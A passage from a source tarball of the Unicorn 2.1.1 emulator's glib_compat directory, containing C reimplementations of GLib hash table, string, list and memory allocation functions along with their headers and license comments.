node_index = g_hash_table_lookup_node_for_insertion (hash_table, key, &key_hash); node = &hash_table->nodes [node_index]; old_hash = node->key_hash; if (old_hash > 1) { if (keep_new_key) { if (hash_table->key_destroy_func) hash_table->key_destroy_func (node->key); node->key = key; } else { if (hash_table->key_destroy_func) hash_table->key_destroy_func (key); } if (hash_table->value_destroy_func) hash_table->value_destroy_func (node->value); node->value = value; } else { node->key = key; node->value = value; node->key_hash = key_hash; hash_table->nnodes++; if (old_hash == 0) { /* We replaced an empty node, and not a tombstone */ hash_table->noccupied++; g_hash_table_maybe_resize (hash_table); } } } void g_hash_table_replace (GHashTable *hash_table, gpointer key, gpointer value) { g_hash_table_insert_internal (hash_table, key, value, TRUE); } /** * g_hash_table_insert: * @hash_table: a #GHashTable. * @key: a key to insert. * @value: the value to associate with the key. * * Inserts a new key and value into a #GHashTable. * * If the key already exists in the #GHashTable its current value is replaced * with the new value. If you supplied a @value_destroy_func when creating the * #GHashTable, the old value is freed using that function. If you supplied * a @key_destroy_func when creating the #GHashTable, the passed key is freed * using that function. **/ gboolean g_hash_table_insert (GHashTable *hash_table, gpointer key, gpointer value) { g_hash_table_insert_internal (hash_table, key, value, FALSE); return true; } /* * g_hash_table_lookup_node: * @hash_table: our #GHashTable * @key: the key to lookup against * @hash_return: optional key hash return location * Return value: index of the described #GHashNode * * Performs a lookup in the hash table. Virtually all hash operations * will use this function internally. * * This function first computes the hash value of the key using the * user's hash function. * * If an entry in the table matching @key is found then this function * returns the index of that entry in the table, and if not, the * index of an empty node (never a tombstone). */ static inline guint g_hash_table_lookup_node (GHashTable *hash_table, gconstpointer key) { GHashNode *node; guint node_index; guint hash_value; guint step = 0; /* Empty buckets have hash_value set to 0, and for tombstones, it's 1. * We need to make sure our hash value is not one of these. */ hash_value = (* hash_table->hash_func) (key); if (hash_value <= 1) hash_value = 2; node_index = hash_value % hash_table->mod; node = &hash_table->nodes [node_index]; while (node->key_hash) { /* We first check if our full hash values * are equal so we can avoid calling the full-blown * key equality function in most cases. */ if (node->key_hash == hash_value) { if (hash_table->key_equal_func) { if (hash_table->key_equal_func (node->key, key)) break; } else if (node->key == key) { break; } } step++; node_index += step; node_index &= hash_table->mask; node = &hash_table->nodes [node_index]; } return node_index; } /** * g_hash_table_lookup: * @hash_table: a #GHashTable. * @key: the key to look up. * * Looks up a key in a #GHashTable. Note that this function cannot * distinguish between a key that is not present and one which is present * and has the value %NULL. If you need this distinction, use * g_hash_table_lookup_extended(). * * Return value: the associated value, or %NULL if the key is not found. **/ gpointer g_hash_table_lookup (GHashTable *hash_table, gconstpointer key) { GHashNode *node; guint node_index; if (hash_table == NULL) return NULL; node_index = g_hash_table_lookup_node (hash_table, key); node = &hash_table->nodes [node_index]; return node->key_hash ? node->value : NULL; } /** * g_hash_table_new: * @hash_func: a function to create a hash value from a key. * Hash values are used to determine where keys are stored within the * #GHashTable data structure. The g_direct_hash(), g_int_hash(), * g_int64_hash(), g_double_hash() and g_str_hash() functions are provided * for some common types of keys. * If hash_func is %NULL, g_direct_hash() is used. * @key_equal_func: a function to check two keys for equality. This is * used when looking up keys in the #GHashTable. The g_direct_equal(), * g_int_equal(), g_int64_equal(), g_double_equal() and g_str_equal() * functions are provided for the most common types of keys. * If @key_equal_func is %NULL, keys are compared directly in a similar * fashion to g_direct_equal(), but without the overhead of a function call. * * Creates a new #GHashTable with a reference count of 1. * * Return value: a new #GHashTable. **/ GHashTable *g_hash_table_new(GHashFunc hash_func, GEqualFunc key_equal_func) { return g_hash_table_new_full(hash_func, key_equal_func, NULL, NULL); } /** * g_hash_table_new_full: * @hash_func: a function to create a hash value from a key. * @key_equal_func: a function to check two keys for equality. * @key_destroy_func: a function to free the memory allocated for the key * used when removing the entry from the #GHashTable or %NULL if you * don't want to supply such a function. * @value_destroy_func: a function to free the memory allocated for the * value used when removing the entry from the #GHashTable or %NULL if * you don't want to supply such a function. * * Creates a new #GHashTable like g_hash_table_new() with a reference count * of 1 and allows to specify functions to free the memory allocated for the * key and value that get called when removing the entry from the #GHashTable. * * Return value: a new #GHashTable. **/ GHashTable* g_hash_table_new_full (GHashFunc hash_func, GEqualFunc key_equal_func, GDestroyNotify key_destroy_func, GDestroyNotify value_destroy_func) { GHashTable *hash_table; hash_table = (GHashTable*)g_malloc(sizeof(GHashTable)); //hash_table = g_slice_new (GHashTable); g_hash_table_set_shift (hash_table, HASH_TABLE_MIN_SHIFT); hash_table->nnodes = 0; hash_table->noccupied = 0; hash_table->hash_func = hash_func ? hash_func : g_direct_hash; hash_table->key_equal_func = key_equal_func; hash_table->ref_count = 1; hash_table->key_destroy_func = key_destroy_func; hash_table->value_destroy_func = value_destroy_func; hash_table->nodes = g_new0 (GHashNode, hash_table->size); return hash_table; } /* * g_hash_table_remove_all_nodes: * @hash_table: our #GHashTable * @notify: %TRUE if the destroy notify handlers are to be called * * Removes all nodes from the table. Since this may be a precursor to * freeing the table entirely, no resize is performed. * * If @notify is %TRUE then the destroy notify functions are called * for the key and value of the hash node. */ static void g_hash_table_remove_all_nodes (GHashTable *hash_table, gboolean notify) { int i; for (i = 0; i < hash_table->size; i++) { GHashNode *node = &hash_table->nodes [i]; if (node->key_hash > 1) { if (notify && hash_table->key_destroy_func) hash_table->key_destroy_func (node->key); if (notify && hash_table->value_destroy_func) hash_table->value_destroy_func (node->value); } } /* We need to set node->key_hash = 0 for all nodes - might as well be GC * friendly and clear everything */ memset (hash_table->nodes, 0, hash_table->size * sizeof (GHashNode)); hash_table->nnodes = 0; hash_table->noccupied = 0; } /** * g_hash_table_remove_all: * @hash_table: a #GHashTable * * Removes all keys and their associated values from a #GHashTable. * * If the #GHashTable was created using g_hash_table_new_full(), the keys * and values are freed using the supplied destroy functions, otherwise you * have to make sure that any dynamically allocated values are freed * yourself. * * Since: 2.12 **/ void g_hash_table_remove_all (GHashTable *hash_table) { if (hash_table == NULL) return; g_hash_table_remove_all_nodes (hash_table, TRUE); g_hash_table_maybe_resize (hash_table); } /* * g_hash_table_remove_node: * @hash_table: our #GHashTable * @node: pointer to node to remove * @notify: %TRUE if the destroy notify handlers are to be called * * Removes a node from the hash table and updates the node count. * The node is replaced by a tombstone. No table resize is performed. * * If @notify is %TRUE then the destroy notify functions are called * for the key and value of the hash node. */ static void g_hash_table_remove_node (GHashTable *hash_table, GHashNode *node, gboolean notify) { if (notify && hash_table->key_destroy_func) hash_table->key_destroy_func (node->key); if (notify && hash_table->value_destroy_func) hash_table->value_destroy_func (node->value); /* Erect tombstone */ node->key_hash = 1; /* Be GC friendly */ node->key = NULL; node->value = NULL; hash_table->nnodes--; } /* * g_hash_table_remove_internal: * @hash_table: our #GHashTable * @key: the key to remove * @notify: %TRUE if the destroy notify handlers are to be called * Return value: %TRUE if a node was found and removed, else %FALSE * * Implements the common logic for the g_hash_table_remove() and * g_hash_table_steal() functions. * * Do a lookup of @key and remove it if it is found, calling the * destroy notify handlers only if @notify is %TRUE. */ static gboolean g_hash_table_remove_internal (GHashTable *hash_table, gconstpointer key, gboolean notify) { GHashNode *node; guint node_index; if (hash_table == NULL) return FALSE; node_index = g_hash_table_lookup_node (hash_table, key); node = &hash_table->nodes [node_index]; /* g_hash_table_lookup_node() never returns a tombstone, so this is safe */ if (!node->key_hash) return FALSE; g_hash_table_remove_node (hash_table, node, notify); g_hash_table_maybe_resize (hash_table); return TRUE; } /** * g_hash_table_remove: * @hash_table: a #GHashTable. * @key: the key to remove. * * Removes a key and its associated value from a #GHashTable. * * If the #GHashTable was created using g_hash_table_new_full(), the * key and value are freed using the supplied destroy functions, otherwise * you have to make sure that any dynamically allocated values are freed * yourself. * * Return value: %TRUE if the key was found and removed from the #GHashTable. **/ gboolean g_hash_table_remove (GHashTable *hash_table, gconstpointer key) { return g_hash_table_remove_internal (hash_table, key, TRUE); } /** * g_hash_table_unref: * @hash_table: a valid #GHashTable. * * Atomically decrements the reference count of @hash_table by one. * If the reference count drops to 0, all keys and values will be * destroyed, and all memory allocated by the hash table is released. * This function is MT-safe and may be called from any thread. * * Since: 2.10 **/ void g_hash_table_unref (GHashTable *hash_table) { if (hash_table == NULL) return; if (hash_table->ref_count == 0) return; hash_table->ref_count--; if (hash_table->ref_count == 0) { g_hash_table_remove_all_nodes (hash_table, TRUE); g_free (hash_table->nodes); g_free (hash_table); } } /** * g_hash_table_ref: * @hash_table: a valid #GHashTable. * * Atomically increments the reference count of @hash_table by one. * This function is MT-safe and may be called from any thread. * * Return value: the passed in #GHashTable. * * Since: 2.10 **/ GHashTable *g_hash_table_ref (GHashTable *hash_table) { if (hash_table == NULL) return NULL; if (hash_table->ref_count == 0) return hash_table; //g_atomic_int_add (&hash_table->ref_count, 1); hash_table->ref_count++; return hash_table; } guint g_hash_table_size(GHashTable *hash_table) { if (hash_table == NULL) return 0; return hash_table->nnodes; } /* END of g_hash_table related functions */ #if 0 /* general g_XXX substitutes */ void g_free(gpointer ptr) { free(ptr); } gpointer g_malloc(size_t size) { void *res; if (size == 0) return NULL; res = malloc(size); if (res == NULL) exit(1); return res; } gpointer g_malloc0(size_t size) { void *res; if (size == 0) return NULL; res = calloc(size, 1); if (res == NULL) exit(1); return res; } gpointer g_try_malloc0(size_t size) { if (size == 0) return NULL; return calloc(size, 1); } gpointer g_realloc(gpointer ptr, size_t size) { void *res; if (size == 0) { free(ptr); return NULL; } res = realloc(ptr, size); if (res == NULL) exit(1); return res; } #endif char *g_strdup(const char *str) { #ifdef _MSC_VER return str ? _strdup(str) : NULL; #else return str ? strdup(str) : NULL; #endif } char *g_strdup_printf(const char *format, ...) { va_list ap; char *res; va_start(ap, format); res = g_strdup_vprintf(format, ap); va_end(ap); return res; } char *g_strdup_vprintf(const char *format, va_list ap) { char *str_res = NULL; #ifdef _MSC_VER int len = _vscprintf(format, ap); if( len < 0 ) return NULL; str_res = (char *)malloc(len+1); if(str_res==NULL) return NULL; vsnprintf(str_res, len+1, format, ap); #else int ret = vasprintf(&str_res, format, ap); if (ret == -1) { return NULL; } #endif return str_res; } char *g_strndup(const char *str, size_t n) { /* try to mimic glib's g_strndup */ char *res = calloc(n + 1, 1); strncpy(res, str, n); return res; } void g_strfreev(char **str_array) { char **p = str_array; if (p) { while (*p) { free(*p++); } } free(str_array); } gpointer g_memdup(gconstpointer mem, size_t byte_size) { if (mem) { void *res = g_malloc(byte_size); memcpy(res, mem, byte_size); return res; } return NULL; } gpointer g_new_(size_t sz, size_t n_structs) { size_t need = sz * n_structs; if ((need / sz) != n_structs) return NULL; return g_malloc(need); } gpointer g_new0_(size_t sz, size_t n_structs) { size_t need = sz * n_structs; if ((need / sz) != n_structs) return NULL; return g_malloc0(need); } gpointer g_renew_(size_t sz, gpointer mem, size_t n_structs) { size_t need = sz * n_structs; if ((need / sz) != n_structs) return NULL; return g_realloc(mem, need); } /** * g_strconcat: * @string1: the first string to add, which must not be %NULL * @Varargs: a %NULL-terminated list of strings to append to the string * * Concatenates all of the given strings into one long string. * The returned string should be freed with g_free() when no longer needed. * * Note that this function is usually not the right function to use to * assemble a translated message from pieces, since proper translation * often requires the pieces to be reordered. * * <warning><para>The variable argument list <emphasis>must</emphasis> end * with %NULL. If you forget the %NULL, g_strconcat() will start appending * random memory junk to your string.</para></warning> * * Returns: a newly-allocated string containing all the string arguments */ gchar* g_strconcat (const gchar *string1, ...) { va_list ap; char *res; size_t sz = strlen(string1); va_start(ap, string1); while (1) { char *arg = va_arg(ap, char*); if (arg == NULL) break; sz += strlen(arg); } va_end(ap); res = g_malloc(sz + 1); strcpy(res, string1); va_start(ap, string1); while (1) { char *arg = va_arg(ap, char*); if (arg == NULL) break; strcat(res, arg); } va_end(ap); return res; } /** * g_strsplit: * @string: a string to split. * @delimiter: a string which specifies the places at which to split the string. * The delimiter is not included in any of the resulting strings, unless * @max_tokens is reached. * @max_tokens: the maximum number of pieces to split @string into. If this is * less than 1, the string is split completely. * * Splits a string into a maximum of @max_tokens pieces, using the given * @delimiter. If @max_tokens is reached, the remainder of @string is appended * to the last token. * * As a special case, the result of splitting the empty string "" is an empty * vector, not a vector containing a single string. The reason for this * special case is that being able to represent a empty vector is typically * more useful than consistent handling of empty elements. If you do need * to represent empty elements, you'll need to check for the empty string * before calling g_strsplit(). * * Return value: a newly-allocated %NULL-terminated array of strings. Use * g_strfreev() to free it. **/ gchar** g_strsplit (const gchar *string, const gchar *delimiter, gint max_tokens) { GSList *string_list = NULL, *slist; gchar **str_array, *s; guint n = 0; const gchar *remainder; if (string == NULL) return NULL; if (delimiter == NULL) return NULL; if (delimiter[0] == '\0') return NULL; if (max_tokens < 1) max_tokens = G_MAXINT; remainder = string; s = strstr (remainder, delimiter); if (s) { gsize delimiter_len = strlen (delimiter); while (--max_tokens && s) { gsize len; len = s - remainder; string_list = g_slist_prepend (string_list, g_strndup (remainder, len)); n++; remainder = s + delimiter_len; s = strstr (remainder, delimiter); } } if (*string) { n++; string_list = g_slist_prepend (string_list, g_strdup (remainder)); } str_array = g_new (gchar*, n + 1); str_array[n--] = NULL; for (slist = string_list; slist; slist = slist->next) str_array[n--] = slist->data; g_slist_free (string_list); return str_array; } GSList *g_slist_find_custom (GSList *list, gconstpointer data, GCompareFunc func) { if (!func) return NULL; while (list) { if (func (list->data, data) == 0) return list; list = list->next; } return NULL; } int g_strcmp0 (const char *str1, const char *str2) { if (!str1 && !str2) return 0; if (!str1 || !str2) return 0; return strcmp(str1, str2); } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/glib_compat.h�������������������������������������������������������������0000664�0000000�0000000�00000006237�14675241067�0020125�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* glib_compat.h replacement functionality for glib code used in qemu Copyright (C) 2016 Chris Eagle cseagle at gmail dot com This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ #ifndef __GLIB_COMPAT_H #define __GLIB_COMPAT_H #include "unicorn/platform.h" #include <stdarg.h> #include <stdlib.h> #include <assert.h> #define G_MAXUINT UINT_MAX #define G_MAXINT INT_MAX #include "gtestutils.h" #include "gtypes.h" #include "garray.h" #include "gtree.h" #include "ghash.h" #include "gmem.h" #include "gslice.h" #include "gmessages.h" #include "gpattern.h" #include "grand.h" #include "glist.h" #include "gnode.h" typedef gint (*GCompareDataFunc)(gconstpointer a, gconstpointer b, gpointer user_data); typedef void (*GFunc)(gpointer data, gpointer user_data); typedef gint (*GCompareFunc)(gconstpointer v1, gconstpointer v2); guint g_str_hash(gconstpointer v); gboolean g_str_equal(gconstpointer v1, gconstpointer v2); guint g_int_hash(gconstpointer v); gboolean g_int_equal(gconstpointer v1, gconstpointer v2); int g_strcmp0(const char *str1, const char *str2); GList *g_list_first(GList *list); void g_list_foreach(GList *list, GFunc func, gpointer user_data); void g_list_free(GList *list); GList *g_list_insert_sorted(GList *list, gpointer data, GCompareFunc compare); #define g_list_next(list) (list->next) GList *g_list_prepend(GList *list, gpointer data); GList *g_list_remove_link(GList *list, GList *llink); GList *g_list_sort(GList *list, GCompareFunc compare); typedef struct _GSList { gpointer data; struct _GSList *next; } GSList; GSList *g_slist_append(GSList *list, gpointer data); void g_slist_foreach(GSList *list, GFunc func, gpointer user_data); void g_slist_free(GSList *list); GSList *g_slist_prepend(GSList *list, gpointer data); GSList *g_slist_sort(GSList *list, GCompareFunc compare); GSList *g_slist_find_custom(GSList *list, gconstpointer data, GCompareFunc func); /* replacement for g_malloc dependency */ void g_free(gpointer ptr); gpointer g_realloc(gpointer ptr, size_t size); char *g_strdup(const char *str); char *g_strdup_printf(const char *format, ...); char *g_strdup_vprintf(const char *format, va_list ap); char *g_strndup(const char *str, size_t n); void g_strfreev(char **v); gpointer g_memdup(gconstpointer mem, size_t byte_size); gpointer g_new_(size_t sz, size_t n_structs); gpointer g_new0_(size_t sz, size_t n_structs); gpointer g_renew_(size_t sz, gpointer mem, size_t n_structs); gchar** g_strsplit (const gchar *string, const gchar *delimiter, gint max_tokens); #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/glist.c�������������������������������������������������������������������0000664�0000000�0000000�00000010017�14675241067�0016751�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ /* * MT safe */ #include "gtypes.h" #include "glist.h" #include "gslice.h" #include "gmessages.h" #define _g_list_alloc() g_slice_new (GList) #define _g_list_alloc0() g_slice_new0 (GList) #define _g_list_free1(list) g_slice_free (GList, list) /** * g_list_alloc: * * Allocates space for one #GList element. It is called by * g_list_append(), g_list_prepend(), g_list_insert() and * g_list_insert_sorted() and so is rarely used on its own. * * Returns: a pointer to the newly-allocated #GList element **/ GList *g_list_alloc (void) { return _g_list_alloc0 (); } static inline GList *_g_list_remove_link (GList *list, GList *link) { if (link == NULL) return list; if (link->prev) { if (link->prev->next == link) link->prev->next = link->next; //else // g_warning ("corrupted double-linked list detected"); } if (link->next) { if (link->next->prev == link) link->next->prev = link->prev; //else // g_warning ("corrupted double-linked list detected"); } if (link == list) list = list->next; link->next = NULL; link->prev = NULL; return list; } /** * g_list_delete_link: * @list: a #GList, this must point to the top of the list * @link_: node to delete from @list * * Removes the node link_ from the list and frees it. * Compare this to g_list_remove_link() which removes the node * without freeing it. * * Returns: the (possibly changed) start of the #GList */ GList *g_list_delete_link (GList *list, GList *link_) { list = _g_list_remove_link (list, link_); _g_list_free1 (link_); return list; } /** * g_list_insert_before: * @list: a pointer to a #GList, this must point to the top of the list * @sibling: the list element before which the new element * is inserted or %NULL to insert at the end of the list * @data: the data for the new element * * Inserts a new element into the list before the given position. * * Returns: the (possibly changed) start of the #GList */ GList *g_list_insert_before (GList *list, GList *sibling, gpointer data) { if (list == NULL) { list = g_list_alloc (); list->data = data; g_return_val_if_fail (sibling == NULL, list); return list; } else if (sibling != NULL) { GList *node; node = _g_list_alloc (); node->data = data; node->prev = sibling->prev; node->next = sibling; sibling->prev = node; if (node->prev != NULL) { node->prev->next = node; return list; } else { g_return_val_if_fail (sibling == list, node); return node; } } else { GList *last; for (last = list; last->next != NULL; last = last->next) {} last->next = _g_list_alloc (); last->next->data = data; last->next->prev = last; last->next->next = NULL; return list; } } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/glist.h�������������������������������������������������������������������0000664�0000000�0000000�00000002546�14675241067�0016766�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ #ifndef __G_LIST_H__ #define __G_LIST_H__ #include "gmem.h" typedef struct _GList GList; struct _GList { gpointer data; GList *next; GList *prev; }; GList* g_list_insert_before (GList *list, GList *sibling, gpointer data); GList* g_list_delete_link (GList *list, GList *link_); #endif /* __G_LIST_H__ */ ����������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gmacros.h�����������������������������������������������������������������0000664�0000000�0000000�00000003705�14675241067�0017275�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ /* This file must not include any other glib header file and must thus * not refer to variables from glibconfig.h */ #ifndef __G_MACROS_H__ #define __G_MACROS_H__ /* We include stddef.h to get the system's definition of NULL */ #include <stddef.h> /* Here we provide G_GNUC_EXTENSION as an alias for __extension__, * where this is valid. This allows for warningless compilation of * "long long" types even in the presence of '-ansi -pedantic'. */ #if __GNUC__ > 2 || (__GNUC__ == 2 && __GNUC_MINOR__ >= 8) #define G_GNUC_EXTENSION __extension__ #else #define G_GNUC_EXTENSION #endif #if !(defined (G_STMT_START) && defined (G_STMT_END)) #define G_STMT_START do #if defined (_MSC_VER) && (_MSC_VER >= 1500) #define G_STMT_END \ __pragma(warning(push)) \ __pragma(warning(disable:4127)) \ while(0) \ __pragma(warning(pop)) #else #define G_STMT_END while (0) #endif #endif #endif /* __G_MACROS_H__ */ �����������������������������������������������������������unicorn-2.1.1/glib_compat/gmem.c��������������������������������������������������������������������0000664�0000000�0000000�00000015223�14675241067�0016560�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ /* * MT safe */ #include "gtypes.h" #include "gmem.h" #include <stdlib.h> #include "gslice.h" #define SIZE_OVERFLOWS(a,b) (((b) > 0 && (a) > G_MAXSIZE / (b))) /** * g_try_malloc: * @n_bytes: number of bytes to allocate. * * Attempts to allocate @n_bytes, and returns %NULL on failure. * Contrast with g_malloc(), which aborts the program on failure. * * Returns: the allocated memory, or %NULL. */ gpointer g_try_malloc (gsize n_bytes) { gpointer mem; if (n_bytes) mem = malloc (n_bytes); else mem = NULL; return mem; } /** * g_try_malloc_n: * @n_blocks: the number of blocks to allocate * @n_block_bytes: the size of each block in bytes * * This function is similar to g_try_malloc(), allocating (@n_blocks * @n_block_bytes) bytes, * but care is taken to detect possible overflow during multiplication. * * Since: 2.24 * Returns: the allocated memory, or %NULL. */ gpointer g_try_malloc_n (gsize n_blocks, gsize n_block_bytes) { if (SIZE_OVERFLOWS (n_blocks, n_block_bytes)) return NULL; return g_try_malloc (n_blocks * n_block_bytes); } /** * g_malloc: * @n_bytes: the number of bytes to allocate * * Allocates @n_bytes bytes of memory. * If @n_bytes is 0 it returns %NULL. * * Returns: a pointer to the allocated memory */ gpointer g_malloc (gsize n_bytes) { if (n_bytes) { gpointer mem; mem = malloc (n_bytes); if (mem) return mem; //g_error ("%s: failed to allocate %"G_GSIZE_FORMAT" bytes", // G_STRLOC, n_bytes); } return NULL; } /** * g_malloc_n: * @n_blocks: the number of blocks to allocate * @n_block_bytes: the size of each block in bytes * * This function is similar to g_malloc(), allocating (@n_blocks * @n_block_bytes) bytes, * but care is taken to detect possible overflow during multiplication. * * Since: 2.24 * Returns: a pointer to the allocated memory */ gpointer g_malloc_n (gsize n_blocks, gsize n_block_bytes) { if (SIZE_OVERFLOWS (n_blocks, n_block_bytes)) { //g_error ("%s: overflow allocating %"G_GSIZE_FORMAT"*%"G_GSIZE_FORMAT" bytes", // G_STRLOC, n_blocks, n_block_bytes); } return g_malloc (n_blocks * n_block_bytes); } /** * g_malloc0: * @n_bytes: the number of bytes to allocate * * Allocates @n_bytes bytes of memory, initialized to 0's. * If @n_bytes is 0 it returns %NULL. * * Returns: a pointer to the allocated memory */ gpointer g_malloc0 (gsize n_bytes) { if (n_bytes) { gpointer mem; mem = calloc (1, n_bytes); if (mem) return mem; //g_error ("%s: failed to allocate %"G_GSIZE_FORMAT" bytes", // G_STRLOC, n_bytes); } return NULL; } /** * g_malloc0_n: * @n_blocks: the number of blocks to allocate * @n_block_bytes: the size of each block in bytes * * This function is similar to g_malloc0(), allocating (@n_blocks * @n_block_bytes) bytes, * but care is taken to detect possible overflow during multiplication. * * Since: 2.24 * Returns: a pointer to the allocated memory */ gpointer g_malloc0_n (gsize n_blocks, gsize n_block_bytes) { if (SIZE_OVERFLOWS (n_blocks, n_block_bytes)) { //g_error ("%s: overflow allocating %"G_GSIZE_FORMAT"*%"G_GSIZE_FORMAT" bytes", // G_STRLOC, n_blocks, n_block_bytes); } return g_malloc0 (n_blocks * n_block_bytes); } /** * g_try_malloc0: * @n_bytes: number of bytes to allocate * * Attempts to allocate @n_bytes, initialized to 0's, and returns %NULL on * failure. Contrast with g_malloc0(), which aborts the program on failure. * * Since: 2.8 * Returns: the allocated memory, or %NULL */ gpointer g_try_malloc0 (gsize n_bytes) { gpointer mem; if (n_bytes) mem = calloc (1, n_bytes); else mem = NULL; return mem; } /** * g_realloc: * @mem: (nullable): the memory to reallocate * @n_bytes: new size of the memory in bytes * * Reallocates the memory pointed to by @mem, so that it now has space for * @n_bytes bytes of memory. It returns the new address of the memory, which may * have been moved. @mem may be %NULL, in which case it's considered to * have zero-length. @n_bytes may be 0, in which case %NULL will be returned * and @mem will be freed unless it is %NULL. * * Returns: the new address of the allocated memory */ gpointer g_realloc (gpointer mem, gsize n_bytes) { gpointer newmem; if (n_bytes) { newmem = realloc (mem, n_bytes); if (newmem) return newmem; //g_error("%s: failed to allocate %"G_GSIZE_FORMAT" bytes", G_STRLOC, n_bytes); } free (mem); return NULL; } /** * g_realloc_n: * @mem: (nullable): the memory to reallocate * @n_blocks: the number of blocks to allocate * @n_block_bytes: the size of each block in bytes * * This function is similar to g_realloc(), allocating (@n_blocks * @n_block_bytes) bytes, * but care is taken to detect possible overflow during multiplication. * * Since: 2.24 * Returns: the new address of the allocated memory */ gpointer g_realloc_n (gpointer mem, gsize n_blocks, gsize n_block_bytes) { if (SIZE_OVERFLOWS (n_blocks, n_block_bytes)) { //g_error ("%s: overflow allocating %"G_GSIZE_FORMAT"*%"G_GSIZE_FORMAT" bytes", // G_STRLOC, n_blocks, n_block_bytes); } return g_realloc (mem, n_blocks * n_block_bytes); } /** * g_free: * @mem: (nullable): the memory to free * * Frees the memory pointed to by @mem. * * If @mem is %NULL it simply returns, so there is no need to check @mem * against %NULL before calling this function. */ void g_free (gpointer mem) { free (mem); } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/gmem.h��������������������������������������������������������������������0000664�0000000�0000000�00000010530�14675241067�0016561�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by 